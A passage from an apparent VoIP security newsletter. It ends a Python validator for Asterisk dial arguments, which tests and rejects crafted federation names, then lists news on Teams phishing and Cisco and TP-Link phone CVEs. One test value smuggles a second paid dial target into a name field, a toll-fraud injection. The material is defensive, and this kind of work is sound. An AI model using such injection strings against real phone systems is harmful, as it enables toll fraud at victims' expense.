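        "options": parts[2] if len(parts) > 2 else "",
    }

def safe_dial_arg(exten, federation_name):
    """Validate both substituted values before they reach the dialplan."""
    if not EXTEN_RE.match(exten):
        raise ValueError("rejected extension %r" % exten)
    if not is_safe_federation_name(federation_name):
        raise ValueError("rejected federation name %r" % federation_name)
    return build_dial_arg(exten, federation_name)

if __name__ == "__main__":
    # Constructed names: a legitimate one, a toll-fraud injection adding a second target,
    # and one that collapses the timeout to one second.
    for name in ("partner.example",
                 "partner.example&PJSIP/0900123456@paid.example",
                 "partner.example,1,"):
        parsed = parse_dial_args(build_dial_arg("100", name))
        verdict = "ok" if is_safe_federation_name(name) else "REJECT"
        print("%-48s targets=%s timeout=%s -> %s" % (name, parsed["targets"], parsed["timeout"], verdict))
```

If the name has to be consumed inside the dialplan itself, the same allow-list can be applied there with Asterisk's FILTER() function, e.g. ${FILTER(a-zA-Z0-9.-,${FED})}, but validating at the point where the federation is created is the cleaner fix because it keeps the bad value out of the database in the first place.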
Microsoft Teams social engineering targets London councils after breach
Staff at Kensington and Chelsea, Westminster City, and Hammersmith and Fulham councils were targeted through Microsoft Teams with follow-on social engineering (unexpected calls and meeting invitations) after a breach in late 2025. Teams continues to be a first-class phishing and initial-access surface.
Microsoft Teams enables messaging security defaults
Starting January 12, 2026, Microsoft Teams automatically enables messaging safety features by default, including file type protection, malicious URL detection, and user reporting. Applies to tenants using default safety configurations. Worth noting that these defaults protect internal tenant messaging but don’t address the cross-tenant guest access architecture issue where users lose home organization Defender protections when joining external tenants.
Cisco IP phones arbitrary file write (CVE-2025-20335)
A medium severity vulnerability (CVE-2025-20335, CVSS 5.3) in Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone 8875 allows unauthenticated remote attackers to write arbitrary files through inadequate directory permission controls. Requires Web Access to be enabled (disabled by default).
Cisco phones information disclosure (CVE-2025-20336)
An information disclosure vulnerability (CVE-2025-20336) in the same Cisco phone models (Desk Phone 9800, IP Phone 7800/8800, Video Phone 8875) allows unauthenticated remote attackers to access sensitive data. Also requires Web Access to be enabled.
TP-Link VX800v SIP DoS (CVE-2025-15542)
A SIP-based denial of service vulnerability (CVE-2025-15542, CVSS 6.3) in TP-Link VX800v v1.0 allows unauthenticated attackers to flood the device with crafted INVITE messages, blocking all incoming voice calls. Fixed in firmware 800.0.12 (Build 250912).
Thanks to Vulners and other third parties for providing vulnerability source material.
This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share.
To subscribe: here